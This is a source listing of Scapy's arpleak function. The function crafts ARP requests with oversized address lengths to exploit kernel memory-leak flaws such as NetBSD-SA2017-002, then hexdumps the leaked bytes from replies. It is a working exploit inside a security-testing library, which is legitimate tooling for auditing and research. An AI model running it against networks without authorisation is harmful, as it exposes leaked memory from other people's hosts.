Exploit ARP leak flaws, like NetBSD-SA2017-002. https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc
(target, plen=255, hwlen=255, **kargs)
| 1231 | |
| 1232 | @conf.commands.register |
| 1233 | def arpleak(target, plen=255, hwlen=255, **kargs): |
| 1234 | # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList] |
| 1235 | """Exploit ARP leak flaws, like NetBSD-SA2017-002. |
| 1236 | |
| 1237 | https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc |
| 1238 | |
| 1239 | """ |
| 1240 | # We want explicit packets |
| 1241 | pkts_iface = {} # type: Dict[str, List[Packet]] |
| 1242 | for pkt in ARP(pdst=target): |
| 1243 | # We have to do some of Scapy's work since we mess with |
| 1244 | # important values |
| 1245 | iface = conf.route.route(pkt.pdst)[0] |
| 1246 | psrc = get_if_addr(iface) |
| 1247 | hwsrc = get_if_hwaddr(iface) |
| 1248 | pkt.plen = plen |
| 1249 | pkt.hwlen = hwlen |
| 1250 | if plen == 4: |
| 1251 | pkt.psrc = psrc |
| 1252 | else: |
| 1253 | pkt.psrc = inet_aton(psrc)[:plen] |
| 1254 | pkt.pdst = inet_aton(pkt.pdst)[:plen] |
| 1255 | if hwlen == 6: |
| 1256 | pkt.hwsrc = hwsrc |
| 1257 | else: |
| 1258 | pkt.hwsrc = mac2str(hwsrc)[:hwlen] |
| 1259 | pkts_iface.setdefault(iface, []).append( |
| 1260 | Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt |
| 1261 | ) |
| 1262 | ans, unans = SndRcvList(), PacketList(name="Unanswered") |
| 1263 | for iface, pkts in pkts_iface.items(): |
| 1264 | ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs) |
| 1265 | ans += ans_new |
| 1266 | unans += unans_new |
| 1267 | ans.listname = "Results" |
| 1268 | unans.listname = "Unanswered" |
| 1269 | for _, rcv in ans: |
| 1270 | if ARP not in rcv: |
| 1271 | continue |
| 1272 | rcv = rcv[ARP] |
| 1273 | psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc) |
| 1274 | if plen > 4 and len(psrc) > 4: |
| 1275 | print("psrc") |
| 1276 | hexdump(psrc[4:]) |
| 1277 | print() |
| 1278 | hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc) |
| 1279 | if hwlen > 6 and len(hwsrc) > 6: |
| 1280 | print("hwsrc") |
| 1281 | hexdump(hwsrc[6:]) |
| 1282 | print() |
| 1283 | return ans, unans |
nothing calls this directly
no test coverage detected